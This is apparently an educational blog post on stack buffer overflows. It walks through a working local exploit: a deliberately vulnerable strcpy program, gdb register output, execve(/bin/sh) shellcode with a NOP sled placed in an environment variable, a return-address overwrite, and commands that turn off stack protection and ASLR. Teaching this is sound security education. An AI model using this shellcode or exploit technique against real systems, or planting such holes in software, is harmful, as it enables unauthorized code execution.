Classic Attacks – Buffer Overflow

Welcome back to Technolution.  In today’s post we’re going to be looking at a classic computer security vulnerability, the buffer overflow.  This type of vulnerability can surface in many kinds of programs and has been the vector of exploitation for many real world attacks.  Today, we will attempt to go into a medium level of detail (leaving out an in depth assembly analysis) on buffer overflows, including what causes them, how they can be exploited, and various preventative measures.  Now, let’s get started.

First off, what is a buffer overflow?  A buffer overflow is when a program attempts to place more data into a buffer than the buffer has room for.  How does this manifest?  Well, let’s pretend we have a char array in a C program to act as a buffer for user input.  This could easily happen if the user enters more characters than the length of the program.  In this case, if there wasn’t input validation, the program would have to make the decision on what to do.  However, a computer can’t “make decisions,” all it can do is what it was programmed to do.  For a concrete example, lets look at string copy:

char buffer[7];
char data[] = “somedata”;
strcpy(buffer, data);

In the above C code, the strcpy function will write all the bytes starting from the memory location pointed to by data, until the first null character (which marks the end of the string), to the memory beginning at the location pointed to by buffer.  Since buffer was declared to be 7 bytes long, the 8th byte from data will overwrite something other than the buffer array.  This can end up causing adverse program execution.

To understand how to exploit this, we must understand how memory is used.  When a function is run, memory must be allocated.  The amount of memory allocated depends on the demands of the function.  However, additional memory is allocated for a couple pointers.  One pointer is for the saved stack frame and one is for the return address. Ultimately, the return address is where the program returns execution to after the current function finishes.  Thus, for exploitation, if we can change the return address, we can change what code will be executed next and this is exactly the point of buffer overflows.

Taking the 7 byte buffer above, our memory looks something like this:

    buffer         sfp       ra

[BBBBBBB][xxxx][xxxx]

Each B in the buffer is a byte representing a character, each x in sfp and ra are hex bytes for memory addresses.  Now lets look at strcpy with a different value:

#include <stdio.h>
#include <string.h>

int main()
{
char buffer[7];
char data[] = “aaaaaaaaaaaaaaabbbbcccc”;
strcpy(buffer, data);
}

Running the program we get a segmentation fault!  If we load up gdb we can see the program ends with a strange value in eip (the value loaded from the overwritten return address of the stack frame).

(gdb) run
Starting program: /tmp/.somedir/tst

Program received signal SIGSEGV, Segmentation fault.
0x63636363 in ?? ()
(gdb) info registers
eax 0xbfffdce9 -1073750807
ecx 0x0 0
edx 0x18 24
ebx 0xb76ff4 12021748
esp 0xbfffdd00 0xbfffdd00
ebp 0x62626262 0x62626262
esi 0x0 0
edi 0x0 0
eip 0x63636363 0x63636363
eflags 0x210246 [ PF ZF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

What is does this mean?  What is 0x63?  Well if we load up an ascii chart, we can see hex value 0x63 is the ascii value “c”.  Excellent, we filled eip with “cccc,” just what we were trying to do!  We can also see that esp (the stack pointer) was over written with 0x62, the value for “b”.  Thus, we can assume we had the correct number of a’s over flowing the buffer and filling up a little extra space in memory for things we aren’t quite talking about (Ok, it’s for function parameters. If you remember correctly main always has two, argv[] and argc, mine just happens to take 4 bytes for the argc (32 bit int) and 4 bytes for the name “tstNULL” since strings are null-terminated, so 8 extra a’s).  All we have to do now is find the memory location of any arbitrary code we want to execute, and replace the “cccc” with four hex values representing the memory location of our code.  Upon completion, we will execute the program again and watch the ‘flow!

While we could potentially search through memory looking for useful code to execute, it would be more useful if we could supply the code we want to execute.  However, in many cases this is possible.  Though this code, referred to as shellcode, has a few need to knows.  First, shellcode is opcode.  For those unfamiliar with opcode, it is the actual values (frequently read in hex) which are passed through the physical parts of the computer.  Due to the low level nature of opcode, it is OPERATING SYSTEM and ARCHITECTURE dependent.  This means we need different opcode for each OS and for different hardware architectures.  Additionally, it’s important to remember that  shell code shouldn’t contain any NULL characters (0x00).  The process of deriving shellcode is slightly involved and not the point of today’s article.  Luckily, there are many sources out there to find good shellcode.  Today we will use some Linux shellcode we found online which will run execve(/bin/sh), providing us with a new shell spawned by the program.  The shellcode is as follows:

“\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8”
“\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68”
“\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31”
“\xd2\xb0\x0b\xcd\x80”

Now that we have the code we want to execute, we need to somehow place it into memory.  There are multiple ways to do this given the situation.  One way is to place the shllecode into an environmental variable.  Another might be to place the shellcode in any variable which the program reads from the user or a file.  Today we’ll stick with environmental variables as they are the most straight forward.  In Linux, the command for setting an environmental variable is “export”.  Lets see how to set a variable, SHELLCODE, with our actual shellcode:

user@localhost:~$ export SHELLCODE=$’\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8
\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f
\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80′

We now have an environmental variable called SHELLCODE with the opcode we want to execute.  One thing to notice about the shellcode is the set of \x90 at the beginning.  0x90 is the op-code for no operation (“NOP”).  NOPs don’t cause anything to happen, they just go on to the next operation.  These NOPs are used for padding, so that if we jump to the memory location of any of them, they will just fast-forward to our actual execve(/bin/sh) code.  Now the next thing we need to do is find the memory address of the SHELLCODE variable.  To do this we will use a C program, such as the following:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
if(!argv[1])
exit(1);
printf(“%#x\n”, getenv(argv[1]));
return 0;
}

Upon execution, the above program will give us the memory address of the environmental variable we supplied as the first argument.  Thus, we should run it with the argument SHELLCODE.  Let’s try:

user@localhost:/tmp/.somedir$ ./getmem SHELLCODE
0xbfffde83

Excellent!  We have now inserted our shellcode into memory beginning at address 0xbfffde83 via an environmental variable.  Our final step is to go run our vulnerable program and cause a buffer overflow to overwrite EIP with the value 0xbfffde83.  But before we do, we need to talk about memory formats.  There are two memory formats as we’re talking of today, little-endian and big-endian.  The difference between the two is basically which bit is defined as the highest order bit and which is the lowest.  To keep this post short, we need to write our memory address as little-endian, which means we need to write it in reverse (byte) order.  Let’s re-examine our vulnerable program, and overflow string:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
char buffer[7];
char data[] = “aaaaaaaaaaaaaaabbbbcccc”;
strcpy(buffer, data);
}

To change the overflow string to point to our desired memory address (0xbfffde83), we will write it as the following:

char data[] = “aaaaaaaaaaaaaaabbbb\x83\xde\xff\xbf”;

Thus, our final program with hard-coded memory address pointing to the environmental variable with our shellcode is as follows:

#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buffer[7];
char data[] = “aaaaaaaaaaaaaaabbbb\x83\xde\xff\xbf”;
strcpy(buffer, data);
}

Finally, we’ll compile and test our program.  If everything goes correctly, it should spawn a shell.  One final note is that a lot has changed since the original days of buffer overflows.  As such, many compilers automatically include buffer overflow precautions in the programs they compile.  As a result, we will have to compile our program with a couple special options to make it vulnerable to the simple attack we’re using today.  First, we have to turn off stack guard and stack shield.  Second, we have to allow the stack to be executable, since we’re storing our shellcode there.  Let’s compile and test:

user@localhost:/tmp/.somedir$ gcc -fno-stack-protector -z execstack test.c -o tst
user@localhost:/tmp/.somedir$ ./tst
sh-4.1$

There you have it, a successfully exploited buffer overflow.  If it doesn’t work, one final thing to check would be stack randomization.  “cat /proc/sys/kernel/randomize_va_space” should show 0.  If it returns 1, simply “echo 0 > /proc/sys/kernel/randomize_va_space” to turn it off.

Buffer overflows are one of the older attack vectors when it comes to exploitation and as such, many compilers and operating systems have developed ways to try and prevent these attacks.  However, buffer overflows are still found heavily out in the wild and many of the preventative measures have themselves been circumvented.  In the future we will examine some wargames which focus on various buffer overflows, preventative measures, and ways to combat them.

This entry was posted in Uncategorized and tagged , , . Bookmark the permalink.

Leave a Reply

Your email address will not be published.